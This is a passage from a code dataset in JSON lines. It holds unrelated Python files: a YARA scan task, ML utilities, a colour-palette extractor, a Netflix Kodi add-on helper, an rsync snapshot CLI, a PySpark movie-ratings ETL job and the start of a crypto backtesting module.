arq.close()\r\n conexao.close()\r\n \r\n print(\"Conexão Finalizada\")\r\n print(\"Aguardando nova conexão\")\r\n \r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"lucashca/SOCKET_SERVER-PY","sub_path":"Other/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37059253981","text":"from typing import List, Optional\n\nfrom app import schemas\nfrom app.services.scanners import YaraScanner\n\n\nasync def yara_scan_task(\n ctx_: dict, payload: schemas.YaraScanWithSearchOptions\n) -> schemas.JobResultWrapper:\n scan_results: Optional[List[schemas.YaraScanResult]] = None\n try:\n yara_scanner = YaraScanner(payload.source)\n scan_results = await yara_scanner.scan_snapshots(\n payload.target, payload.filters, size=payload.size, offset=payload.offset\n )\n except Exception as e:\n return schemas.JobResultWrapper(result=scan_results, error=str(e))\n\n return schemas.JobResultWrapper(result=scan_results, error=None)\n","repo_name":"ninoseki/uzen","sub_path":"app/arq/tasks/yara.py","file_name":"yara.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"40"} +{"seq_id":"20439051320","text":"import numpy as np\nimport os\nfrom pathlib import Path\nimport copy\nimport inspect\n\n\ndef get_args(func):\n\tsignature = inspect.signature(func)\n\treturn [k for k, v in signature.parameters.items()]\n\n\ndef get_default_args(func):\n\tsignature = inspect.signature(func)\n\treturn {\n\t\tk: v.default\n\t\tfor k, v in signature.parameters.items()\n\t\tif v.default is not inspect.Parameter.empty\n\t}\n\n\ndef shallow_copy(obj):\n\treturn copy.copy(obj)\n\n\ndef deep_copy(obj):\n\treturn copy.deepcopy(obj)\n\n\ndef mkdir(path):\n\tPath(path).mkdir(parents=True, exist_ok=True)\n\n\ndef close_obj(obj):\n\tif hasattr(obj, 'close'):\n\t\tobj.close()\n\n\ndef random_sample(indices, batch_size):\n\tindices = np.asarray(np.random.permutation(indices))\n\tbatches = indices[:len(indices) // batch_size * batch_size].reshape(-1, batch_size)\n\tfor batch in batches:\n\t\tyield batch\n\tr = len(indices) % batch_size\n\tif r:\n\t\tyield indices[-r:]\n\n\ndef generate_tag(params):\n\tif 'tag' in params.keys():\n\t\treturn\n\tgame = params['game']\n\tparams.setdefault('run', 0)\n\trun = params['run']\n\tdel params['game']\n\tdel params['run']\n\tstr = ['%s_%s' % (k, v) for k, v in sorted(params.items())]\n\ttag = '%s-%s-run-%d' % (game, '-'.join(str), run)\n\tparams['tag'] = tag\n\tparams['game'] = game\n\tparams['run'] = run\n\n\ndef translate(pattern):\n\tgroups = pattern.split('.')\n\tpattern = ('\\.').join(groups)\n\treturn pattern\n\n\ndef split(a, n):\n\tk, m = divmod(len(a), n)\n\treturn (a[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n))\n\n\ndef ensure_dir(d):\n\tif not os.path.exists(d):\n\t\tos.makedirs(d)\n\n\nclass RunningMeanStd(object):\n\t# https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm\n\tdef __init__(self, epsilon=1e-4, shape=()):\n\t\tself.mean = np.zeros(shape, 'float64')\n\t\tself.var = np.ones(shape, 'float64')\n\t\tself.count = epsilon\n\t\n\tdef update(self, x):\n\t\tbatch_mean = np.mean(x, axis=0)\n\t\tbatch_var = np.var(x, axis=0)\n\t\tbatch_count = x.shape[0]\n\t\tself.update_from_moments(batch_mean, batch_var, batch_count)\n\t\n\tdef update_from_moments(self, batch_mean, batch_var, batch_count):\n\t\tself.mean, self.var, self.count = update_mean_var_count_from_moments(\n\t\t\tself.mean, self.var, self.count, batch_mean, batch_var, batch_count)\n\n\ndef update_mean_var_count_from_moments(mean, var, count, batch_mean, batch_var, batch_count):\n\tdelta = batch_mean - mean\n\ttot_count = count + batch_count\n\t\n\tnew_mean = mean + delta * batch_count / tot_count\n\tm_a = var * count\n\tm_b = batch_var * batch_count\n\tM2 = m_a + m_b + np.square(delta) * count * batch_count / tot_count\n\tnew_var = M2 / tot_count\n\tnew_count = tot_count\n\t\n\treturn new_mean, new_var, new_count","repo_name":"chandar-lab/LoCA2","sub_path":"dyna-exp/core/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"36988009328","text":"import numpy as np\r\nimport cv2\r\nfrom sklearn.cluster import KMeans\r\n\r\ndef get_palette(img_path, n_colors):\r\n # Loading the image and transform it\r\n img = cv2.imread(img_path)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGRA2RGB)\r\n\r\n # Flat the image\r\n flat_img = img.reshape((img.shape[0] * img.shape[1], 3))\r\n \r\n # Define and train the model\r\n clt = KMeans(n_colors)\r\n clt.fit(flat_img)\r\n\r\n # Get the colors\r\n colors = clt.cluster_centers_.astype(int).tolist()\r\n \r\n # Make an histogram\r\n n_bins = np.arange(0, clt.n_clusters + 1)\r\n data_hist = clt.labels_\r\n (hist, _) = np.histogram(data_hist, bins=n_bins)\r\n hist = hist.astype(float)\r\n \r\n # Normalize the data\r\n hist /= hist.sum()\r\n\r\n return colors, list(hist)\r\n","repo_name":"BubuDavid/Color-Palette_Picker","sub_path":"models/color_picker.py","file_name":"color_picker.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70764192761","text":"import json\n\nfrom resources.utility import generic_utility\n\n\nclass CacheMissException(Exception):\n def __init__(self, jsn):\n self.jsn = jsn\n\n\ndef req_path(*paths):\n from resources import connect\n\n auth_url = generic_utility.auth_url()\n endpoints = generic_utility.endpoints()\n\n if not auth_url or not endpoints:\n connect.do_login()\n\n post = '{\"paths\":['\n for curpath in paths:\n post += curpath+','\n post = post[:-1]\n post += '],\"authURL\":\"%s\"}' % auth_url\n\n content = connect.load_netflix_site(generic_utility.evaluator_url % (generic_utility.api_url, endpoints['/pathEvaluator']), post)\n jsn = json.loads(content)\n if 'error' in jsn:\n err = jsn['error']\n if 'innerErrors' in err:\n inners = err['innerErrors']\n for inner_err in inners:\n if 'message' in inner_err:\n msg = inner_err['message']\n if 'Map cache miss' == msg:\n raise CacheMissException(content)\n raise Exception('Invalid path response: ' + content)\n if 'value' not in jsn:\n raise Exception('Invalid path response: ' + content)\n\n return jsn['value']\n\ndef get_root_list_id_from_cookie():\n from resources import connect\n profile = generic_utility.get_setting('selected_profile')\n\n session = connect.get_netflix_session(False)\n\n root_list_id = None\n if not profile:\n generic_utility.log('kein profil!')\n for cur_cookie in session.cookies:\n if 'lhpuuidh-browse-' in cur_cookie.name:\n# generic_utility.log('found cookie: '+cur_cookie.value)\n root_list_id = cur_cookie.value\n break\n elif 'lhpuuid-kid-' in cur_cookie.name:\n root_list_id = cur_cookie.value\n else:\n for cur_cookie in session.cookies:\n if 'lhpuuidh-browse-'+profile in cur_cookie.name:\n root_list_id = cur_cookie.value\n break\n elif 'lhpuuid-kid-'+profile in cur_cookie.name:\n root_list_id = cur_cookie.value\n\n if not root_list_id:\n raise ValueError('root_list_id not found in cookies!')\n\n splt = root_list_id.split('%3A')\n if(len(splt) != 3):\n raise ValueError('Invalid split: '+root_list_id)\n\n# generic_utility.log('root: '+str(splt[2]))\n return splt[2]\n\n\ndef from_to(fromnr, tonr):\n return '{\"from\":%d,\"to\":%d}' % (fromnr, tonr)\n\ndef path(type, *parms):\n retpath = '['+type+','\n for parm in parms:\n retpath += parm+','\n retpath = retpath[:-1]\n retpath += ']'\n return retpath\n\ndef filter_empty(jsn):\n for key in jsn.keys():\n if type(jsn[key]) == dict and '$type' in jsn[key] and jsn[key]['$type'] == 'sentinel':\n del jsn[key]\n elif type(jsn[key]) == dict:\n filter_empty(jsn[key])\n\ndef child(chld, jsn):\n if not chld in jsn:\n raise ValueError(str(chld)+' not found in: '+str(jsn))\n return jsn[chld]\n\ndef deref(ref, jsn):\n val = jsn\n idx = None\n for layer in ref:\n if not layer in val:\n raise ValueError(str(layer)+' not found in: '+str(jsn))\n val = val[layer]\n idx = layer\n return idx, val\n","repo_name":"listamilton/supermilton.repository","sub_path":"plugin.video.supermiltonflix/resources/path_evaluator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37187394755","text":"import logging\nimport os\nimport sys\n\nfrom cliff import app\nfrom cliff import command\nfrom cliff import commandmanager\n\nimport trsync\n\nfrom trsync.objects import rsync_mirror\nfrom trsync.objects import rsync_ops\nfrom trsync.objects import rsync_url\n\n\nclass PushCmd(command.Command):\n log = logging.getLogger(__name__)\n\n def get_description(self):\n return \"push SRC to several DST with snapshots\"\n\n def get_parser(self, prog_name):\n parser = super(PushCmd, self).get_parser(prog_name)\n parser.add_argument('source',\n help='Source rsync url (local, rsyncd, remote '\n 'shell). Mean that it is a directory, not a file.')\n parser.add_argument('-n', '--snapshot-name',\n default='',\n required=False,\n help='Snapshot name. Source url directory name by '\n 'default. Will contain the source/ '\n 'content on remote. Full snapshot name will be '\n '\"{snapshot-name}-{timestamp}\". Snapshot will be '\n 'placed in directory specified by '\n '\"--snapshots-dir\" option. Also '\n '\"{snapshot-name}-latest\" symlink will be updated '\n 'on successful sync (--latest-successful-postfix)')\n parser.add_argument('-d', '--dest',\n nargs='+',\n required=True,\n help='Destination rsync url(s)')\n parser.add_argument('-t', '--timestamp',\n required=False,\n help='Specified timestamp will be used for '\n 'snapshot. Will be generated automaticaly by '\n 'default. Format:yyyy-mm-dd-hhMMSS')\n parser.add_argument('--snapshots-dir', '--snapshot-dir',\n required=False,\n default='snapshots',\n help='Directory name for snapshots relative '\n '\"destination\". \"snapshots\" by default')\n parser.add_argument('--init-directory-structure',\n action='store_true',\n required=False,\n default=False,\n help='It specified, all directories including'\n '\"snapshots-dir\" will be created on remote '\n 'location. Disabled by default.')\n parser.add_argument('--snapshot-lifetime', '--save-latest-days',\n required=False,\n default=61,\n help='Snapshots for specified number of days will '\n 'be saved. All older will be removed. 61 by '\n 'default. 0 mean that old snapshots will not be '\n 'deleted, \"None\" mean that all snapshots '\n 'excluding latest will be deleted')\n parser.add_argument('--latest-successful-postfix',\n required=False,\n default='latest',\n help='Postfix for symlink to latest successfully '\n 'synced snapshot. Also used as --link-dest '\n 'target. \"latest\" by default.')\n parser.add_argument('-s', '--symlinks',\n nargs='+',\n required=False,\n default=[],\n help='Update additional symlinks relative '\n 'destination. Only \"latest\" by default.')\n parser.add_argument('--extra',\n required=False,\n default='',\n help='String with additional rsync parameters. '\n 'For example it may be \"\\--dry-run '\n '--any-rsync-option\".Use \"\\\\\" to disable '\n 'argparse to parse extra value.')\n\n return parser\n\n def take_action(self, parsed_args):\n properties = vars(parsed_args)\n source_url = properties.pop('source', None)\n snapshot_name = properties.pop('snapshot_name', '').strip(' /')\n symlinks = properties.pop('symlinks', None)\n servers = properties.pop('dest', None)\n if properties['extra'].startswith('\\\\'):\n properties['extra'] = properties['extra'][1:]\n properties['rsync_extra_params'] = properties.pop('extra')\n properties['snapshot_lifetime'] = \\\n None if properties['snapshot_lifetime'] == 'None' \\\n else int(properties['snapshot_lifetime'])\n\n source = rsync_ops.RsyncOps(source_url)\n source_url = source.url.url_dir()\n if not snapshot_name:\n snapshot_name = os.path.basename(source.url.path)\n if not snapshot_name:\n raise RuntimeError(\"Can't detect 'snapshot_name'. \"\n \"Use '-n' option to specify it.\")\n\n report = dict()\n exitcode = 0\n\n for server in servers:\n report[server] = dict()\n try:\n remote = rsync_mirror.TRsync(server, **properties)\n remote.push(source_url, snapshot_name, symlinks=symlinks)\n report[server]['success'] = True\n except Exception as e:\n report[server]['success'] = False\n report[server]['log'] = e.message\n exitcode = 1\n\n for srv, msg in report.items():\n if msg['success']:\n self.log.info('Push %s to %s: SUCCESS' % (source_url, srv))\n else:\n self.log.error('Push %s to %s: FAILED' % (source_url, srv))\n self.log.error(msg['log'])\n\n sys.exit(exitcode)\n\n\nclass SymlinkCmd(command.Command):\n log = logging.getLogger(__name__)\n\n def get_description(self):\n return \"Create (or update) symlinks on remote\"\n\n def get_parser(self, prog_name):\n parser = super(SymlinkCmd, self).get_parser(prog_name)\n parser.add_argument('-d', '--dest',\n nargs='+',\n required=True,\n help='Destination rsync url (local, rsyncd, '\n 'remote shell).')\n parser.add_argument('-t', '--target',\n required=True,\n help='All the symlinks will target to (relative '\n 'symlink name). Url by default.')\n parser.add_argument('-s', '--symlinks',\n nargs='+',\n required=True,\n default=[],\n help='Update specified symlinks (names relative '\n 'dest).')\n parser.add_argument('--update',\n action='store_true',\n required=False,\n default=False,\n help='It specified, all existent symlinks will be '\n 'updated. Will be skiped otherwise. Disabled by '\n 'default.')\n parser.add_argument('--extra',\n required=False,\n default='',\n help='String with additional rsync parameters. '\n 'For example it may be \"\\--dry-run '\n '--any-rsync-option\".Use \"\\\\\" to disable '\n 'argparse to parse extra value.')\n\n return parser\n\n def take_action(self, parsed_args):\n properties = vars(parsed_args)\n symlinks = properties.pop('symlinks', [])\n for symlink in symlinks:\n if symlink.startswith('/') or symlink.startswith('../'):\n self.log.error('Symlink name outside the root url: %s',\n symlink)\n raise RuntimeError('Symlink name the root url: {}'\n ''.format(symlink))\n servers = properties.pop('dest', None)\n target = properties.pop('target', None)\n if properties['extra'].startswith('\\\\'):\n properties['extra'] = properties['extra'][1:]\n properties['rsync_extra_params'] = properties.pop('extra')\n update = properties.pop('update', None)\n\n report = dict()\n exitcode = 0\n\n for server in servers:\n report[server] = dict()\n try:\n remote = rsync_ops.RsyncOps(server, **properties)\n for symlink in symlinks:\n remote.symlink(symlink, target, update=update)\n report[server]['success'] = True\n except Exception as e:\n report[server]['success'] = False\n report[server]['log'] = e.message\n exitcode = 1\n\n for srv, msg in report.items():\n if msg['success']:\n self.log.info('Creating symlinks %s targeted to %s on %s: '\n 'SUCCESS' % (str(symlinks), target, srv))\n else:\n self.log.error('Creating symlinks %s targeted to %s on %s: '\n 'FAILED' % (str(symlinks), target, srv))\n self.log.error(msg['log'])\n\n sys.exit(exitcode)\n\n\nclass RemoveCmd(command.Command):\n log = logging.getLogger(__name__)\n\n def get_description(self):\n return \"remove all specified paths from several DST recursively\"\n\n def get_parser(self, prog_name):\n parser = super(RemoveCmd, self).get_parser(prog_name)\n\n parser.add_argument('path',\n nargs='+',\n help='Path to remove')\n parser.add_argument('-d', '--dest',\n nargs='+',\n required=True,\n help='Destination rsync url')\n parser.add_argument('--extra',\n required=False,\n default='',\n help='String with additional rsync parameters. '\n 'For example it may be \"\\--dry-run '\n '--any-rsync-option\". Use \"\\\\\" to disable '\n 'argparse to parse extra value.')\n return parser\n\n def take_action(self, parsed_args):\n properties = vars(parsed_args)\n servers = properties.pop('dest', None)\n path = properties.pop('path', None)\n if properties['extra'].startswith('\\\\'):\n properties['extra'] = properties['extra'][1:]\n properties['rsync_extra_params'] = properties.pop('extra')\n\n report = dict()\n exitcode = 0\n for server in servers:\n report[server] = dict()\n self.log.info(\"Removing items {}\".format(str(path)))\n try:\n remote = rsync_ops.RsyncOps(server, **properties)\n remote.rm_all(path)\n report[server]['success'] = True\n except Exception as e:\n report[server]['success'] = False\n report[server]['log'] = e.message\n exitcode = 1\n\n for srv, msg in report.items():\n if msg['success']:\n self.log.info('Remove %s: SUCCESS' % (path))\n else:\n self.log.error('Remove %s: FAILED' % (path))\n\n sys.exit(exitcode)\n\n\nclass GetTargetCmd(command.Command):\n log = logging.getLogger(__name__)\n\n def get_description(self):\n return \"Evaluate the target for specified symlink \"\\\n \"(optional recursively)\"\n\n def get_parser(self, prog_name):\n parser = super(GetTargetCmd, self).get_parser(prog_name)\n\n parser.add_argument('symlink_url',\n help='Symlink url to resolve (supported by rsync)')\n parser.add_argument('-r', '--recursive',\n action='store_true',\n required=False,\n default=False,\n help='It specified, the symlink will be resolved '\n 'recursively (if the symlink targeted to other '\n 'symlinks tree - they will be resolved too). '\n 'Disabled by default.')\n return parser\n\n def take_action(self, parsed_args):\n properties = vars(parsed_args)\n symlink_url = properties.pop('symlink_url', None)\n recursive = properties.pop('recursive', False)\n\n url = rsync_url.RsyncUrl(symlink_url)\n remote = rsync_ops.RsyncOps(url.root, **properties)\n target = remote.symlink_target(url.path, recursive=recursive)\n print(target)\n\n\nclass TRsyncApp(app.App):\n log = logging.getLogger(__name__)\n\n def __init__(self):\n super(TRsyncApp, self).__init__(\n description='TRsync',\n version=trsync.__version__,\n command_manager=commandmanager.CommandManager('trsync'),\n deferred_help=True,\n )\n\n\ndef main(argv=sys.argv[1:]):\n app = TRsyncApp()\n return app.run(argv)\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv[1:]))\n","repo_name":"mrasskazov/trsync","sub_path":"trsync/cmd/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":13480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6670116850","text":"from datetime import datetime\nfrom tvb.basic.logger.builder import get_logger\nfrom tvb.core.entities.file.files_helper import FilesHelper\nfrom tvb.core.entities.model.model_datatype import DataTypeGroup\nfrom tvb.core.entities.model.simulator.burst_configuration import BurstConfiguration2\nfrom tvb.core.entities.storage import dao\nfrom tvb.core.utils import format_bytes_human, format_timedelta\n\nMAX_BURSTS_DISPLAYED = 50\n\nclass BurstService2(object):\n\n def __init__(self):\n self.logger = get_logger(self.__class__.__module__)\n self.file_helper = FilesHelper()\n\n def mark_burst_finished(self, burst_entity, burst_status=None, error_message=None):\n \"\"\"\n Mark Burst status field.\n Also compute 'weight' for current burst: no of operations inside, estimate time on disk...\n\n :param burst_entity: BurstConfiguration to be updated, at finish time.\n :param burst_status: BurstConfiguration status. By default BURST_FINISHED\n :param error_message: If given, set the status to error and perpetuate the message.\n \"\"\"\n if burst_status is None:\n burst_status = BurstConfiguration2.BURST_FINISHED\n if error_message is not None:\n burst_status = BurstConfiguration2.BURST_ERROR\n\n try:\n ### If there are any DataType Groups in current Burst, update their counter.\n burst_dt_groups = dao.get_generic_entity(DataTypeGroup, burst_entity.id, \"fk_parent_burst\")\n for dt_group in burst_dt_groups:\n dt_group.count_results = dao.count_datatypes_in_group(dt_group.id)\n dt_group.disk_size, dt_group.subject = dao.get_summary_for_group(dt_group.id)\n dao.store_entity(dt_group)\n\n ### Update actual Burst entity fields\n burst_entity.datatypes_number = dao.count_datatypes_in_burst(burst_entity.id)\n\n burst_entity.status = burst_status\n burst_entity.error_message = error_message\n burst_entity.finish_time = datetime.now()\n dao.store_entity(burst_entity)\n except Exception:\n self.logger.exception(\"Could not correctly update Burst status and meta-data!\")\n burst_entity.status = burst_status\n burst_entity.error_message = \"Error when updating Burst Status\"\n burst_entity.finish_time = datetime.now()\n dao.store_entity(burst_entity)\n\n def persist_operation_state(self, operation, operation_status, message=None):\n \"\"\"\n Update Operation instance state. Store it in DB and on HDD/\n :param operation: Operation instance\n :param operation_status: new status\n :param message: message in case of error\n :return: operation instance changed\n \"\"\"\n operation.mark_complete(operation_status, message)\n dao.store_entity(operation)\n operation = dao.get_operation_by_id(operation.id)\n self.file_helper.write_operation_metadata(operation)\n return operation\n\n def get_burst_for_operation_id(self, operation_id):\n return dao.get_burst_for_operation_id(operation_id)\n\n @staticmethod\n def rename_burst(burst_id, new_name):\n \"\"\"\n Rename the burst given by burst_id, setting it's new name to\n burst_name.\n \"\"\"\n burst = dao.get_burst_by_id(burst_id)\n burst.name = new_name\n dao.store_entity(burst)\n\n @staticmethod\n def get_available_bursts(project_id):\n \"\"\"\n Return all the burst for the current project.\n \"\"\"\n bursts = dao.get_bursts_for_project(project_id, page_size=MAX_BURSTS_DISPLAYED) or []\n # for burst in bursts:\n # burst.prepare_after_load()\n return bursts\n\n @staticmethod\n def populate_burst_disk_usage(bursts):\n \"\"\"\n Adds a disk_usage field to each burst object.\n The disk usage is computed as the sum of the datatypes generated by a burst\n \"\"\"\n sizes = dao.compute_bursts_disk_size([b.id for b in bursts])\n for b in bursts:\n b.disk_size = format_bytes_human(sizes[b.id])\n\n def update_history_status(self, id_list):\n \"\"\"\n For each burst_id received in the id_list read new status from DB and return a list [id, new_status] pair.\n \"\"\"\n result = []\n for b_id in id_list:\n burst = dao.get_burst_by_id(b_id)\n # burst.prepare_after_load()\n if burst is not None:\n if burst.status == burst.BURST_RUNNING:\n running_time = datetime.now() - burst.start_time\n else:\n running_time = burst.finish_time - burst.start_time\n running_time = format_timedelta(running_time, most_significant2=False)\n\n if burst.status == burst.BURST_ERROR:\n msg = 'Check Operations page for error Message'\n else:\n msg = ''\n result.append([burst.id, burst.status, burst.is_group, msg, running_time])\n else:\n self.logger.debug(\"Could not find burst with id=\" + str(b_id) + \". Might have been deleted by user!!\")\n return result\n","repo_name":"maedoc/tvb-root","sub_path":"framework_tvb/tvb/core/services/burst_service2.py","file_name":"burst_service2.py","file_ext":"py","file_size_in_byte":5204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"34831129762","text":"\r\n# Library and external modules declaration\r\nfrom pyspark.sql.window import Window\r\nfrom pyspark.sql import SparkSession\r\nfrom pyspark.sql.functions import *\r\nfrom pyspark.sql.types import *\r\nfrom conf.config import CleanConfigurations\r\nimport pyspark\r\nimport logging\r\n\r\nlogging.getLogger(\"py4j\").setLevel(logging.INFO)\r\nlogging.basicConfig(format='[%(asctime)s] - %(levelname)s - %(message)s')\r\nlogger = logging.getLogger()\r\nlogger.setLevel(logging.DEBUG)\r\n\r\nclass ETLJob(object):\r\n def main(self):\r\n \"\"\"\r\n This function is used for performing transformation operations.\r\n \"\"\"\r\n # Reading Movies data\r\n movies_df = self.read_source_data(CleanConfigurations.MOVIES_FILE_PATH, CleanConfigurations.MOVIES_FILE_EXTENSION, CleanConfigurations.MOVIES_SCHEMA, \r\n CleanConfigurations.MOVIES_HEADER, CleanConfigurations.MOVIES_DELIMITER)\r\n logger.info(\"Movies file data read completed\")\r\n \r\n # Reading Ratings data\r\n ratings_df = self.read_source_data(CleanConfigurations.RATINGS_FILE_PATH, CleanConfigurations.RATINGS_FILE_EXTENSION, CleanConfigurations.RATINGS_SCHEMA, \r\n CleanConfigurations.RATINGS_HEADER, CleanConfigurations.RATINGS_DELIMITER)\r\n logger.info(\"Ratings file data read completed\")\r\n\r\n # Getting Min, Max and Average for each movie\r\n output_df= self.joined_data(movies_df, ratings_df)\r\n\r\n # Getting top 3 movies based on their rating\r\n top_3_movies_df = self.top_3_movies_data(movies_df, ratings_df)\r\n\r\n # Writing data\r\n self.write_output_data(output_df,CleanConfigurations.TASK2_OUTPUT_PATH)\r\n self.write_output_data(top_3_movies_df,CleanConfigurations.TASK3_OUTPUT_PATH)\r\n\r\n def read_source_data(self, path, file_extension, final_struc, header, delimiter):\r\n \"\"\"\r\n This function is used to read data with mutiple options.\r\n \"\"\"\r\n if file_extension == 'csv' or file_extension == 'txt' or file_extension == 'dat':\r\n input_df = spark.read.csv(path, header=header, sep=delimiter, schema=final_struc)\r\n elif file_extension == 'parquet':\r\n # input_df = spark.read.parquet(path, schema=final_struc)\r\n input_df = spark.read.schema(final_struc).parquet(path)\r\n elif file_extension == 'json':\r\n input_df = spark.read.json(path, multiLine=True, schema=final_struc)\r\n else:\r\n raise Exception(\"File Format Not Supported\")\r\n return input_df\r\n \r\n def joined_data(self, movies_df, ratings_df):\r\n \"\"\"\r\n Getting max, min and average rating for each movie from ratimgs data \r\n \"\"\"\r\n # Getting Min, Max and Average for each movie\r\n grouped_ratings_df = ratings_df.groupBy(\"MovieID\").agg(expr(\"max(Rating)\").alias(\"MaxRating\"),\r\n expr(\"min(Rating)\").alias(\"MinRating\"),\r\n expr(\"avg(Rating)\").alias(\"AverageRating\"))\r\n\r\n # Joining movies data with ratings data\r\n joined_df = movies_df.join(grouped_ratings_df, movies_df.MovieID == grouped_ratings_df.MovieID).drop(grouped_ratings_df.MovieID)\r\n return joined_df\r\n \r\n def top_3_movies_data(self, movies_df, ratings_df):\r\n \"\"\"\r\n Getting top 3 movies based on their rating\r\n \"\"\"\r\n # Getting top 3 movies rated by each user\r\n w = Window.partitionBy(\"UserID\").orderBy(col(\"Rating\").desc())\r\n combined_df = ratings_df.join(movies_df, movies_df.MovieID == ratings_df.MovieID,'leftouter').drop(movies_df.MovieID)\r\n combined_rank_df = combined_df.withColumn(\"rank\",row_number().over(w))\r\n top_3_movies_df = combined_rank_df.filter(combined_rank_df.rank <= 3).drop(\"rank\")\r\n return top_3_movies_df\r\n \r\n def write_output_data(self, df, path):\r\n \"\"\"\r\n This function is used to write data at specified output location.\r\n \"\"\"\r\n df.coalesce(1).write.mode(\"overwrite\").parquet(path)\r\n logger.info(\"Parquet file created in directory: {}\".format(path))\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n application_name = \"movies-app\"\r\n logger.info(\"Application - {} started\".format(application_name))\r\n spark_conf = CleanConfigurations.SPARK_CONF.get('CONF', [])\r\n if spark_conf:\r\n logger.info(\"SparkSession getting created with custom spark configuration\")\r\n conf = pyspark.SparkConf().setAll(spark_conf)\r\n spark = SparkSession.builder.appName(application_name) \\\r\n .config(conf=conf) \\\r\n .enableHiveSupport() \\\r\n .master(\"local[*]\")\\\r\n .getOrCreate()\r\n else:\r\n logger.info(\"SparkSession getting created with default spark configuration\")\r\n spark = SparkSession.builder.appName(application_name) \\\r\n .enableHiveSupport() \\\r\n .master(\"local[*]\")\\\r\n .getOrCreate()\r\n ETLJob().main()\r\n spark.stop()\r\n except Exception as e:\r\n logger.error(\"Failed while performing ETL job with error - \" + str(e))\r\n raise e\r\n\r\n","repo_name":"khedikar/newday-movies-app","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":5168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11800476716","text":"# 5주차 k사 기둥과 보 설치\ndef solution(n, build_frame):\n \n answer = []\n\n def possible(x, y, a):\n if a == 0: # 기둥 제한 조건\n if y == 0 or [x, y - 1, 0] in answer or [x - 1, y, 1] in answer or [x, y, 1] in answer:\n return True # 가능\n return False # 불가\n \n else: # 보 제한 조건\n if [x, y - 1, 0] in answer or [x + 1, y - 1, 0] in answer or ([x - 1, y, 1] in answer and [x + 1, y, 1] in answer):\n return True # 가능\n return False # 불가\n \n for f in build_frame:\n if f[3] == 1 and possible(f[0], f[1], f[2]): # 설치가 가능하다면\n answer.append([f[0], f[1], f[2]]) # 설치\n elif f[3] == 0: # 삭제 시\n answer.remove([f[0], f[1], f[2]]) # 우선 삭제\n for a in answer:\n if possible(a[0], a[1], a[2]) is False: # 나머지 요소에 대한 제한 조건 검사\n answer.append([f[0], f[1], f[2]]) # 불가 시 되돌리기\n break\n \n answer.sort()\n return answer","repo_name":"zzarbttoo/TMT","sub_path":"HI/20200729_k_5.py","file_name":"20200729_k_5.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"30443131668","text":"import os\nimport sys\nimport enum\nfrom loguru import logger as log\n\n_ = os.path.abspath(os.path.dirname(__file__)) # 返回当前文件路径\nroot_path = os.path.abspath(os.path.join(_, '../')) # 返回根目录文件夹\nsys.path.append(root_path)\n\nfrom config import root_path,output_path\nfrom utils import tools, ind, reader\nfrom environ import RankAscending, FilterAfter, cdn_num_ls\n# from src_backtesting.config import root_path\n# from src_backtesting.utils import reader, tools, ind\n\nimport math\nimport platform\nimport warnings\nimport pandas as pd\nimport numpy as np\nimport itertools\nimport datetime\nfrom joblib import Parallel, delayed\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objects as go\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as tc\n\nwarnings.filterwarnings(\"ignore\")\n\nfrom typing import Union, List\nmin_qty_path = os.path.join(_, '���小下单量.csv')\nrtn_data_path = os.path.join(output_path,'中性回放结果')\n\neps = 1e-8\n\ndef load_playCfg(playCfg):\n return playCfg['c_rate'][0], playCfg['hold_hour_num'][0], playCfg['long_coin_num'][0], playCfg['short_coin_num'][0], playCfg[\n 'long_p'][0], playCfg['short_p'][0], playCfg['leverage'][0], playCfg['long_risk_position'][0], playCfg['initial_trade_usdt'][0], playCfg['offset_stop_win'][0], playCfg['offset_stop_loss'][0]\n\n\ndef load_othCfg(othCfg):\n return othCfg['log_level'], othCfg['cal_factor_type'], othCfg['hourly_details'], othCfg['select_by_hour'], othCfg['filter_before_exec'], othCfg['filter_after_exec'], othCfg[\n 'start_date'], othCfg['end_date'], othCfg['factor_long_list'], othCfg['factor_short_list'], othCfg['trade_type'], othCfg['compound_name'], \\\n othCfg['quit_symbol_filter_hour'], othCfg['p_signal_fun'], othCfg['select_offsets'], othCfg['white_list'], othCfg['black_list']\n\n\ndef filter_generate(direction: str = 'long', filter_factor: str = '涨跌幅max_fl_24', filter_type: str = 'value',\n compare_operator: str = 'lt', filter_value: Union[int, float, List[Union[int, float]]] = 0.2,\n rank_ascending: bool = False, filter_after: bool = False, weight_ratio: float = 0, param: list = None) -> str:\n \"\"\"\n : param direction: 过滤的方向 '多'/'long'/'df1'或 '空'/'short'/'df2'\n : param filter_factor: 过滤因子名 如 '涨跌幅max_fl_24'\n : param filter_type: 过滤方式 value/rank/pct 原始数值/排名(默认从大到小)/百分位(从小到大)\n : param filter_value: 过滤阈值 支持 int float list\n : param compare_operator: 和数值的比较关系 lt gt bt nbt lte gte bte nbte eq ne\n : param rank_ascending: True/False 控制 rank模式下的排名方向,对pct无效\n : param filter_after: False/True 是否为后置过滤\n : param weight_ratio: 